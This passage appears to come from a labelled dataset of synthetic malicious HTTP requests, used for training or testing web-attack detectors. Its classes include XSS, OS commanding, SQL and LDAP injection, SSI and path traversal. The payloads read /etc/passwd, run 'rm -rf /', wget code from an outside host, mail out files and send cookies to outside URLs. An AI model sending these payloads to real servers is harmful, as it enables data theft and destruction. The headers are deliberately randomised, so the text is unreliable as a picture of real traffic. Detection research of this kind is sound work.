If-Range: "UnzgtYQ3ZshVSzp4d"
Max-Forwards: 8
Pragma: no-cache
Authorization: NTLM YWhhamxoQWJyN3NaM2kwdGloZGU4aWR4c2ExdGRMbGhsdGR0b2VhZQ==
Range: -57,-072,-891
Referer: http://1mta.be/eaepZtts.exe
Trailer: Pragma
User-Agent: Mozilla/5.1 (Windows; U; Win98 9.0; s0-ar; rv:2.3.1) Gecko/87998479
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9690x5155
Via: 7.3 168.28.175.37
Transfer-Encoding: deflate
Warning: 478 www.atuy.css "969s" 
X-Forwarded-For: 228.11.44.229
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

O0yalibpnfvrv=| cat /etc/passwd&rpassthrutTXs1hdxy=797730

End - Id: 43083
Start - Id: 46947
class: XSS
POST /enzdn2en/gJZ8_g4sIcK3/frcnrla4nede37/e8rhe.jsp? HTTP/1.0
Content-Length: 246
Content-Language: 0e
Content-Encoding: identity
Content-Location: http://www.h6ettue.de/8bipn/nAutt/5altbtl/2Jmt/ai2ds.htm
Content-MD5: bXJvM2FucHJodlByc1Jqcw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Apr 05 04:41:52 GMT
Last-Modified: Sat, 15 Mar 08 09:36:08 CET
Host: www.tneshlrgak.st:80
Connection: eCDql
Accept: video/mpeg, image/png
Accept-Charset: gb2312
Accept-Encoding: 
Accept-Language: n-31pt9;q=0.6, zr3-are7h;q=0.3, n38a-snA9iho, t-rpoeih
Cache-Control: no-transform
Client-ip: 19.178.124.208
Cookie: afys3nrelsN=nmnertiw
Cookie2: $Version="22"
Date: Fri, 04 Jan 08 10:13:36 CET
ETag: "2QUjnUW_IVja0L.6aDN"
Expect: ocr3E
From: 2cxo@n9mijtAeoE.biz
If-Modified-Since: Wed, 24 Nov 04 04:58:07 UTC
If-Unmodified-Since: Sun, 08 Jul 07 12:09:50 CET
If-Match: "S4vIIFLQRqZ8yp.V.L1V"
If-None-Match: *
If-Range: *
Max-Forwards: 14
MIME-Version: 0.6
Pragma: p9hhai93='Thmsaurf'
Authorization: Digest response="7a0eeee0f9Ce72e33Fd3E049A3EC807d"
Range: 16111-
Referer: /lWeEt.bin
TE: trailers,deflate;q=0.8,trailers
User-Agent: eelneNuhxe
UA-Color: color8
Via: 1.4 171.15.76.222, FTP/9.9 248.146.7.124
Transfer-Encoding: lukLdw
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vbscriptnodeTBptmp9hY5Fn=nsNjer&t8wkolwxa=atxv.dAf.&tr=<![CDATA[<!--]]   ><script    >[document.location.replace  ('http://www.en.com/cgi-bin/ne.cgi'+document.cookie);]//--></script    >

End - Id: 46947
Start - Id: 44541
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.1
Host: 45.74.74.239:3270
Connection: swsbdf
Accept: text/*, image/jpeg
Accept-Charset: iso-10646-ucs-2, windows-1253, x-mac-hebrew, iso-8859-9;q=0.0, cp-950
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: max-age=04
Client-ip: 15.83.253.70
Cookie: a2wbk4cn=ii2nle5yoevlb;-8wfE9Dk=nst
Date: Thu, 14 May 09 08:37:30 GMT
ETag: "jkPmPul2szt6mLKeLP"
If-Modified-Since: Sat, 07 Jan 06 17:24:40 UTC
If-None-Match: "bQXwuKY3N2uBnpfm"
If-Range: *
Max-Forwards: 5
MIME-Version: 3.6
Pragma: hse=r
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: Basic ckxodDpzbUVu
Range: -06354,383-6635,26244-
Referer: http://www.4Hhsh.st/9IsaCtw/A1EVa0e.php3
TE: deflate;q=0.2
Trailer: Accept-Language
User-Agent: w.tNch http://www.iidlppqe.be
UA-Pixels: 069x3705
Via: 6.0 www.rmHi6x.shtml:820, 2.0 52.249.176.251
Transfer-Encoding: gzip
Warning: 779 79.125.87.32 "msD320sj" 
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44541
Start - Id: 41561
class: SqlInjection
GET /EoaaiweoENei/cuIzh2l.FRq8s9Z/ebSSLWVYY8zi05En/JFEo3ybqH1sT/tOeyuaeAmqg7NeErr/tLgpNcHmQHjQ_s@Xz4XV/annneg5im.htm?nstsehdiodCemt=qwer%27+or+Rl_v.Account%3D%27Tna%40oo.com HTTP/1.1
Host: www.dekm.uk:80
Connection: F38uas
Accept: */*;q=0.3
Accept-Charset: ks_c_5601-1987;q=0.8
Accept-Encoding: 
Accept-Language: c-osnajiro;q=0.5, aors-ur;q=0.8, gfLezesc-peribtOs, oaeenkeb-pjlront, hh295iht-d
Cache-Control: max-stale
Client-ip: 3.1.92.141
Cookie: oataja=11;crnl8f1r6=alogs1txvar&nn ui;rhal=o=ot:;rpp=actthiueamyerc;lhtaccesoM9brcp6WfjL=saxGUGKZXlQ;oIeeuaormhOMk=%u(tsleve9hlee
Cookie2: $Version="799"
Date: Thu, 01 Jun 06 12:44:24 UTC
Expect: 100-continue
From: usaacy07@scsi6.be
If-Modified-Since: Mon, 28 Dec 09 06:57:54 CET
If-Unmodified-Since: Tue, 05 Jan 10 16:23:31 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 26 Oct 04 18:27:15 GMT
Max-Forwards: 5935
MIME-Version: 4.6
Pragma: 1n=tn
Proxy-Authorization: Digest cnonce="uSmsdotr"
Authorization: NTLM MHkzcm9XZWt0b0hwdDlydDlzZWdpcWVFZmgzZXJyZWVuZQ==
Range: -4865,558329-,-5
Referer: http://www.uPrt.com/hddd5/2Seeieh/yhphe.pdf
TE: trailers,trailers,chunked;q=0.9
Trailer: Connection
User-Agent: Mozilla/0.1 (X11; U; Linux i586 4.8; du-jt; rv:6.9.9) Gecko/21804599
UA-OS: Win95
UA-Color: color32
UA-Pixels: 1852x515
Via: vjti2i/8.3 www.uRhR3ler.tiff:388, 5.5 www.hice.js
Transfer-Encoding: identity
Upgrade: 1uitte/1.5, Ore6/5.0
Warning: 868 212.59.150.87 "tTe6e" "Fri, 15 May 09 11:43:43 UTC"
X-Forwarded-For: 166.15.230.232
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41561
Start - Id: 42960
class: OsCommanding
GET /wsdjfiidtN/eieo6sqdatl2/G-c/Idphoec/rAdtrwBOEmdTl@w/hletcfsqa/ezlyXB@SosrB/esY3fF/mHpXedu4WIjA5sYG/euVYj4lLu9Hdw.jsp?dJR8=8adi3nefae046j&u5ginxdooiosO=%7Egi9eusystemmconnectcoptceh7&aRRp=7&hptmpvYY=oMpdDXwN_0.&tCgv=9814&pyYeyaitnawE=996&vsXeeiceEasdmio=3438276&oebuuoep=m%5C%3BtWaw&aiqntedl6hmpN=wohrnfrom&rtreN0h=m%5Diee&ne=99698&yKq2QAMQOC@=wshnaeao&vlpraitn8iddrHo=3 HTTP/1.1
Host: 255.219.70.105
Connection: close
Accept: audio/basic;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: h-at;q=0.8, ze-engX;q=0.3, nprl-i, tEtiv-ioqc4, ude0eyma-dist;q=0.5
Cache-Control: min-fresh=09863
Client-ip: 255.220.136.3
Cookie: pslselectSpositionIpgroup byQe=fj4mogtcsj35onsme;JRD_8='  ;  cat    /tmp/res   mail tevens@veet.com ;;teqi=banBBg;aefeu=8tawuhoo8rAiesclrt;eani=1
Cookie2: $Version="2"
Date: Sun, 21 Jun 09 02:49:45 UTC
ETag: "1LlN38Pqjm5Of3lWe7x"
Expect: 100-continue
From: eefh@5eodhRlM.cz
If-Modified-Since: Thu, 01 Dec 05 16:38:05 UTC
If-Unmodified-Since: Sat, 06 Mar 10 21:57:30 GMT
If-Match: "gS3@-PVVa6Ii84_"
If-None-Match: *
If-Range: Mon, 06 Dec 04 08:00:42 UTC
Max-Forwards: 6852
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic YmVrZ2x0Om1ic3Fl
Authorization: bPris0 sam0eSm=eotsdhin
Range: -752200
Referer: /eteelTte/oephuhn/h96ksnw/Ootn/peOb.cfm
TE: chunked;q=0.3,trailers
Trailer: Transfer-Encoding
User-Agent: ngfresaa6la
UA-CPU: 68000
UA-Disp: 0867,9888,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 175x777
Via: 3.2 www.leIb.html
Transfer-Encoding: osgb; ztsSe2i=ondhI
Upgrade: ewJ/9.0
Warning: 369 www.lroioecl.jpeg "ra1tNci" 
X-Forwarded-For: 101.85.128.32
X-Serial-Number: 1010994054
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42960
Start - Id: 43124
class: OsCommanding
GET /egFTSLT.Jvbh.9Ocfl/ioZEe6Bw6D/tc1shq6tnhbd/rCiAXSFR/MR/crmYIPrcpm3shutdownmrm/shutdownY/Ih8nA0ri/lSDrkEFgSG/sCtefmlimeooyaE0i8hr.gif?ijteEdzohandh=7&bsg5hw=3e&euvtc=%22++%3B+%2Fusr%2Fbin%2Fwget+www.ndstmeictist.com%2Fneitme+++++%3B&clTeeehrPytqnt=767457930&s2ddhKdc=suwherebt&sAt3yYA=where9fnsme+ahhs3%3D HTTP/1.1
Host: 109.92.45.24
Connection: keep-alive
Accept: video/quicktime;q=0.6, image/png
Accept-Charset: big5;q=0.4, iso-8859-1;q=0.0
Accept-Encoding: deflate;q=0.0, identity;q=0.8
Accept-Language: hOrh-5cdvto
Cache-Control: min-fresh=563
Client-ip: 147.97.228.238
Cookie: gaco=256108903;oymtecoodNa=nobjecttobdtWers5;Rjsetenwae=eo
Cookie2: $Version="87"
Date: Thu, 03 May 07 03:26:56 CET
ETag: W/"xZgq7w4Z0E7TALT-"
Expect: spfinn
From: ydaj1@ewfas0rh.de
If-Modified-Since: Fri, 07 Aug 09 06:35:31 UTC
If-Unmodified-Since: Thu, 20 Sep 07 04:27:00 GMT
If-Match: *
If-None-Match: "uMVOVK5gK6xKGWh1"
If-Range: Wed, 23 Apr 08 17:08:31 UTC
Max-Forwards: 747
MIME-Version: 9.7
Pragma: kae='nrif'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: Digest uri=http://ehobetU.st/3ngtancL/trar.php4
Range: 94856-,22-022
Referer: /saxwmnT.msf
TE: deflate;q=0.7,deflate,deflate
Trailer: Host
User-Agent: eeyHin (eNTsSaRhBY; i-6wKBL; rVnKxlip)
UA-CPU: Sparc
UA-Disp: 3218,793,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 0.7 154.236.137.51
Transfer-Encoding: identity
Upgrade: ftb/0.9, eeti/9.1
Warning: 169 190.90.41.27 "mteulHh6dilaof" 
X-Forwarded-For: 209.100.60.54
X-Serial-Number: 231798615796568
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43124
Start - Id: 38318
class: LdapInjection
GET /hD2aNc-87loFB/ou2atkifeaHc/to@S0PZCFnWPTUfJ/n2jQhqOhIZmbq/ies2oochhnEsoctasal/foiy/n5itnlneczaNmeHtbt/rea0tdwfu/c_BiYc.exe?skAXSdm7vJKA=ad5aMD%40&aaihesoE=%29++%28+++%7C++%28pmKe%3D80e*%29 HTTP/1.0
Host: 14.211.104.229
Connection: keep-alive
Accept: text/xml, video/mpeg;q=0.2
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.5, compress, compress;q=0.4
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 168.193.87.154
Cookie: o1o83CDnnflh=r;ezm= tordeau e\idtds;u4qwVFfAMp=sfo9crno;Ltkh=1394;inFboJwTL=y6antd:js9cu>z
Cookie2: $Version="35"
Date: Tue, 27 Feb 07 23:16:40 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: 100-continue
From: uiby5mca@ndt1oraj.be
If-Modified-Since: Sun, 28 Jan 07 09:13:26 CET
If-Unmodified-Since: Sun, 07 Oct 07 15:44:36 UTC
If-Match: "zUwsr3Ut2Oo6_X@@8Y"
If-None-Match: *
If-Range: "VKC4AgD2lbvjicK@et.q"
Max-Forwards: 9298
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Basic bmVPbmxzOnJ5bGF1
Range: 768701-8
Referer: http://ihea.it/dheslh.exe
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: e3QnnaN http://www.sTtr85d.com
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: compress
Upgrade: ipd8o/8.2, wrthnk/5.7, ntg/1.8, rtt/1.6
Warning: 900 78.163.243.190 "eegoi38hvlbccn" "Tue, 23 Aug 05 02:06:35 GMT"
X-Forwarded-For: 36.43.147.188
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38318
Start - Id: 46764
class: XSS
POST /hXZJv9bOlw/obI1tI5VF/rg8NNMoi/t1/wuuhT9oh/h4Vve7ngLEF0m/5R.N9ZDxi4B/t1/h70XD4X17gfSRKS6hX/8xC7LKQ/XTmetapasswdn8RDYcopyB.jpg? HTTP/1.1
Content-Length: 185
Content-Language: fcmc,bqybhe
Content-Encoding: identity
Content-Location: /wha2.mpeg
Content-MD5: N2NwZThlZW54aWhzVHJpeA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 20 Jul 04 10:02:06 UTC
Last-Modified: Mon, 31 Jan 05 16:26:38 GMT
Host: www.n1nnwna.cz
Connection: taeZhei
Accept: */*
Accept-Charset: utf-8, x-mac-cyrillic, iso-8859-7, euc-cn
Accept-Encoding: 
Accept-Language: sibaaa-7pQt, jtisTORd-orrge0;q=0.6, sdgm1bI-noosl;q=0.8, bapsnnd-aio
Cache-Control: no-cache
Client-ip: 202.152.82.23
Cookie2: $Version="609"
Date: Fri, 11 Jun 04 04:55:34 CET
ETag: "uvWwqLBwApGZcIhP"
Expect: 100-continue
If-Modified-Since: Thu, 22 May 08 06:18:58 UTC
If-Unmodified-Since: Mon, 03 May 10 03:41:21 CET
If-Match: *
If-None-Match: "SR@YflsFIEMGg2pm"
If-Range: *
Max-Forwards: 92
Pragma: no-cache
Proxy-Authorization: Basic Z212dGU6ZXJyZWRkZQ==
Range: -03,-42983
Referer: http://spaoetg.st/dNNgt/Sacdsb/org7.dll
TE: gzip;q=0.8,trailers,gzip
User-Agent: ehmts (tI9Xxx-YeT)
UA-Color: color32
UA-Pixels: 1199x1516
Transfer-Encoding: deflate
Warning: 169 130.84.60.97 "veojxxdsnqtnotxti" "Sat, 18 Mar 06 20:44:29 GMT"
X-Forwarded-For: 147.93.122.129

FeoMjewaelbH4m=nw&cei9ic=68902979&eetj3du=<img    src=&{[document.location.replace ('http://www.tare.com/cgi-bin/re.cgi'+document.cookie);]};   >

End - Id: 46764
Start - Id: 42902
class: OsCommanding
GET /su7i1cwSsrd3ebist/aKly/sGg/wNYL/tRR31MGOGPB/sraitiGetp/rdeaa8deFs/xE0vi2/noeeeuatuIyXttmeogi.bin?oi=Rpn&eWhzacaTc=%7C+dir+++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C++++%2C&uGeIxT=+e%26q&Tmochaap35v=zoz%40%3Fb HTTP/1.0
Host: www.6Cn1n.be
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.0
Accept-Encoding: *
Accept-Language: lhtino-uihar;q=0.1, En-Dagnu
Cache-Control: no-transform
Client-ip: 93.245.80.9
Cookie: oR=a y3r)aoooerwj$t1v
Cookie2: $Version="4"
Date: Mon, 22 Aug 05 09:05:25 GMT
ETag: W/"AgkTXED.n5oFVon"
Expect: 100-continue
From: Osrmorba@tAdnt9t.st
If-Modified-Since: Sat, 25 Aug 07 24:19:16 CET
If-Unmodified-Since: Fri, 20 Jun 08 02:11:24 GMT
If-Match: *
If-None-Match: "pLniMe-yAxV60kf"
If-Range: Fri, 19 May 06 08:33:40 CET
Max-Forwards: 206
Pragma: oogudr='t1l'
Proxy-Authorization: tnjdb exudt=knpuX
Authorization: tldlts hhoe5i9=etntdiI4
Range: -35,510946-8117,-846229
Referer: /edaeqt/t7lcr/kosn7w/toagsn/e4eaeEyi.zip
TE: trailers,trailers
User-Agent: lisphee (e7Pz88; pd7__d4u)
UA-Disp: 2272,6803,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0586x7312
Via: 6.7 122.97.168.232, FTP/3.5 www.lor3.png, lolsdY/4.4 229.234.148.253
Transfer-Encoding: identity
X-Forwarded-For: 191.162.116.219
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42902
Start - Id: 39798
class: SSI
GET /0E5/e94_BP@uVb8K-tpO-k/n8ZYMbKPa9C/zsoe2gtcWbejxcEaIdin.mspx?petnehcteyec=connectR&e8s=oestetc&Rei7Natno4rEg=tirs&wOeanismtqissM=iK6RAXPA&kHle7iYu=3t5%3E%28%3Emg%26oe&adXc=cQAZwnUQt&hrriees=rtod9lnppa&yaoejtA=%3C%21--%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E&ir=820073&deo5woui=t&peanepeJsm=rI_eJWkh5A&1qer=e&mdcIaipemutspcf=tYeuymnpebrproeU&5euvrsnt=402816 HTTP/1.1
Host: www.ynhperl.cz:976
Connection: ttrH
Accept: */*
Accept-Charset: cp-936
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.7
Cache-Control: min-fresh=5
Client-ip: 252.98.95.119
Cookie: racRda5wruslh=a?g;oeermit=taQnih5e5tpc;nje=iaene2d;hrPvt5lhi9=QnZhS0
Cookie2: $Version="9"
Date: Thu, 16 Jul 09 12:19:38 CET
ETag: "1MI3X5pRIo3ZW19eTlb1"
Expect: 100-continue
From: otit3le@ijlhneot1o.com
If-Modified-Since: Mon, 25 Aug 08 22:09:53 GMT
If-Unmodified-Since: Mon, 02 Jan 06 23:02:24 UTC
If-Match: "bHJKkxda8xbD6vUFfSP"
If-None-Match: *
If-Range: Sun, 23 Oct 05 10:53:14 GMT
Max-Forwards: 6335
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest nc=Ca5d26eD
Authorization: Digest uri=http://www.wrOk.net/hoodei/i9fdm/hosOp8.rar
Range: 2975-
Referer: http://niekt.org/tpwc6x/o0xe/b8vtfsi/3geoiooe.sh
TE: trailers,gzip,trailers
Trailer: TE
User-Agent: Mozilla/9.8 (Windows; U; Win 9x 2.5; oa-ou; rv:3.5.1) Gecko/45337794
UA-CPU: Sparc
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 468x7869
Via: HTTP/6.3 www.tiCo8.jpg, apsspd/3.6 230.233.79.136, 0.6 99.76.109.82
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
X-Forwarded-For: 197.171.250.97
X-Serial-Number: 39977076241136
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39798
Start - Id: 44938
class: PathTransversal
GET /0OJs/nxax2/h@zaJo-ZeotFxuvUBX/mOgG-nl9XRteoZ/4TPe/uC6ai/etaiDbeee/earY4hxD_/ef2R3yQALBFNRg5pH.e9.asmx?fpustOt=tb3XG&wdy3v=atbiaet&AgCoIOJoAGH7=vUdedgsc&1PWor=Riore&vnhw1n=sHqt&flerdee=seewherenI&Ztakmem=lnefstunOnewninu&Wl@.Rdiv=ep%3A%3F%5Dmd+boot.iniUhr1ti2t7ya&Mpj6DautoexecL=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&hbcan=5raremdertNeim&daobbhntfEx7n=asr2ie HTTP/1.1
Host: www.plpesacenj.biz
Connection: keep-alive
Accept: application/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: kedH-I;q=0.8, dar-1nTh, st-nTso;q=0.5
Cache-Control: no-transform
Client-ip: 205.151.162.96
Cookie: co=ecus;Y3httpsA=tXhtopcr\stdin3;nmup=eafe
Cookie2: $Version="19"
Date: Mon, 27 Oct 08 01:56:12 GMT
ETag: W/"FTabip4q-bvxfAK_"
Expect: El7seo=rAoiW;yh7itv=latecp
From: Tnis@tashwes0i.st
If-Modified-Since: Mon, 25 Sep 06 13:36:58 CET
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: "V@NlObOh6h9Xa1D"
If-None-Match: *
If-Range: Mon, 10 May 04 05:39:10 UTC
Max-Forwards: 45
MIME-Version: 8.4
Pragma: nmaynthe=enrHlq
Proxy-Authorization: NTLM aGExY2ZuZ2h5ZXN0YWVoamkwNjR4c0FxdG96eGh0cmVpcGVjdGVzbmV5ZW1hbg==
Authorization: iaweD nleptOe=4ijclSgY
Range: 032407-30
Referer: /uiop1n7e/eWmaot/aifprgi/Erolm.cgi
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/5.1 (Machintosh; U; Mac OS X 1.8; mj-RY; rv:7.8.1) Gecko/42638842
UA-CPU: StrongARM
UA-Disp: 8355,9239,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 571x611
Via: 4.2 184.255.150.14, FTP/2.3 81.245.48.155
Transfer-Encoding: deflate
Upgrade: stntow/3.4, 4egw/7.2
Warning: 950 137.235.245.175 "hbxglaknHngrreueDa" "Wed, 14 Feb 07 12:55:59 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44938
Start - Id: 44366
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.0
Host: www.qts0yerd.biz
Connection: keep-alive
Accept: video/mpeg;q=0.8, application/zip, audio/basic
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.4, identity;q=0.2, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 85.70.71.191
Cookie: aetisws4sriA=sjee vd8~m7;Nieth=n9mailrt;eW=xohrrhir;depoearnAwd9ii=cynsbgsound
Cookie2: $Version="768"
Date: Mon, 11 Jul 05 03:08:31 GMT
ETag: "0sJ3U838L7y6r98kvw"
Expect: p4ymocrd
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Thu, 05 Nov 09 01:53:09 UTC
If-Unmodified-Since: Sun, 23 Mar 08 19:01:14 CET
If-Match: *
If-None-Match: *
If-Range: "usvv7nHn.nQv.BAuoaKB"
Max-Forwards: 49
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest qop=auth
Range: -126597,56874-704
Referer: /mxso/C1shae1/atlp.bin
TE: gzip;q=0.8
Trailer: Max-Forwards
User-Agent: rtlw/7.4
UA-CPU: x86
UA-Disp: 116,364,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 347x4806
Via: 3.3 www.tmnw.png
Transfer-Encoding: vhcl
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 94309776768789
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44366
Start - Id: 36075
class: PathTransversal
GET /vzbD6JQKVFAa/TEi/ZBaFUDB_d/iNY/gu1SSF.5QPPARDeT/GKmIYsamxidN/h@ACreB5R-BVXx/aEnlXDH78kdP0hLeTkH/ouhbdotcrUedhu/uDdecn7emebds/unde.msf?ueem=l+f+&is6oU5rTx=0dhharnzq&ktt0le=3989&hawlCIiOd8d=wftedce3nmeusz&sktonnt=%5CWINDOWS%5Csystem.ini HTTP/1.0
Host: 0.127.97.123
Connection: nSreEi5
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: odt-G;q=0.8, stivoni-iR6s4Eb;q=0.9, wntrKa1e-oinegr, penimqlw-1n
Cache-Control: no-store
Client-ip: 150.142.192.26
Cookie: tFdyT=osiio6ae
Cookie2: $Version="080"
Date: Sat, 08 Jul 06 13:58:49 GMT
ETag: W/"CHRBHIdtJ0gNNdG"
Expect: tsgiot5z
From: Esva@5c4oorIai.it
If-Modified-Since: Wed, 23 May 07 14:38:50 UTC
If-Unmodified-Since: Fri, 24 Dec 04 20:27:33 CET
If-Match: *
If-None-Match: "yf1XiIeeQHcng@K"
If-Range: Sat, 24 Jan 09 01:04:56 UTC
Max-Forwards: 4
MIME-Version: 8.7
Pragma: d3iIi=y1in
Proxy-Authorization: Basic ZXd3b2Y6aHh0YQ==
Authorization: Basic Y3J0TmlhOmltbGxvYQ==
Range: 67-310757
Referer: /beogo.exe
TE: deflate
Trailer: Warning
User-Agent: Mozilla/4.3 (compatible; Konqueror/6.1; Open BSD i586; tohei0; dsoei; hr6ae)
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 039x0543
Via: zRvcs/6.3 176.175.36.184
Transfer-Encoding: deflate
Upgrade: sztad/3.9, y9oto/3.0
Warning: 527 www.9sie.htm:6837 "5sadjetaoq" 
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36075
Start - Id: 36749
class: OsCommanding
GET /tvtltEneNccdytocsw/YyPinWIy9PUAvtHO/y-nMSgQQe8o/hH1yptX8-vA/pi/txwit4ntAnAtns/oImTK0madq4fz-I5fKR/yv8IQ@7rCZaqR7Uf/mfP5/jasjesan3/xbrg3.html?Gr=%60++rm+-rf+++++%2F++++%60&cltsimHlaIo=51861 HTTP/1.0
Host: 61.32.41.60
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 66.186.73.243
Cookie: optfldO=scriptwinntnrDvar toi geff;ysmjru3Aj54=0173257
Cookie2: $Version="34"
Date: Thu, 09 Mar 06 19:52:58 GMT
ETag: "OSxgv6GwIp@.QEtxE"
Expect: iuowlu=arrod;at3irEyt=cnoiy
From: 9rrtotci@rtshul.org
If-Modified-Since: Fri, 12 Nov 04 21:54:38 CET
If-Unmodified-Since: Mon, 12 Oct 09 17:28:32 UTC
If-Match: *
If-None-Match: "whlAbR@ZXAo_LZWA79"
If-Range: Sat, 03 Apr 10 16:44:27 GMT
Max-Forwards: 4222
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: ttsg7i nehfeHuT=4aeyn
Authorization: NTLM anpOaW5paGdldGVKdW44bHNzdGViYWFudXVhTmJPcnJheWVxOWU=
Range: 50-7
Referer: /et9uane/fesn.js
TE: trailers,deflate;q=0.1
Trailer: From
User-Agent: lqr14Z http://www.atelh3ur.net
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 232x1783
Via: aetiT/9.5 www.mPieot.html, 7.4 84.118.18.122
Transfer-Encoding: identity
Upgrade: sieis/2.5, uit/6.8
Warning: 603 www.nelar.css "fseup" "Fri, 11 Nov 05 23:14:00 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36749
Start - Id: 38865
class: LdapInjection
GET /tXpY2x/sV-IY2yafHdPlqcZG4W/rjB29-g/ftpTJoZo/U.T/e7sd/uoSmhwhloom/T5UgYALPailiYn.css?iuAdut=%29++++%28+%7C+%28displayName%3Dhad*%29++%28name+%3D+had*%29%28+mail%3Dhad*+++%29 HTTP/1.0
Host: www.bioazxer.de
Connection: close
Accept: image/*;q=0.2, text/*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: pdeyr1f-nt;q=0.8, c-ntn0
Cache-Control: max-stale
Client-ip: 214.111.130.134
Cookie: D72BBorNA=nlbtqeiatahrm;AV9qE=cet;orumttntrrhh7et=rxaRDz
Cookie2: $Version="90"
Date: Sat, 19 Jun 04 02:50:30 UTC
ETag: "PbMQvsd@O9GSQt4NCI2"
Expect: t02I
From: tdusret@b5koNnc.biz
If-Modified-Since: Sat, 17 Nov 07 16:01:50 CET
If-Unmodified-Since: Sun, 29 Jun 08 17:30:16 CET
If-Match: "9ClCAQo64_pt9PgpzV9"
If-None-Match: *
If-Range: Tue, 29 Apr 08 21:27:17 CET
Max-Forwards: 6
MIME-Version: 1.7
Pragma: soeEi='begit'
Proxy-Authorization: Basic ZXlkNnJpYTpxRm9tZ3c=
Authorization: NTLM cm9laHJyc21tNnMzdGZsYUhvbnA0b3RUaXVlaGxyamluaDJlbFM=
Range: 317-,-056
Referer: /cEwia.bin
TE: trailers
Trailer: Via
User-Agent: Mozilla/8.6 (Machintosh; U; PPC 7.3; si-Cs; rv:7.7.2) Gecko/11234400
UA-CPU: MIPS
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 9.0 www.lmte.css, FTP/1.4 www.rpeii.png
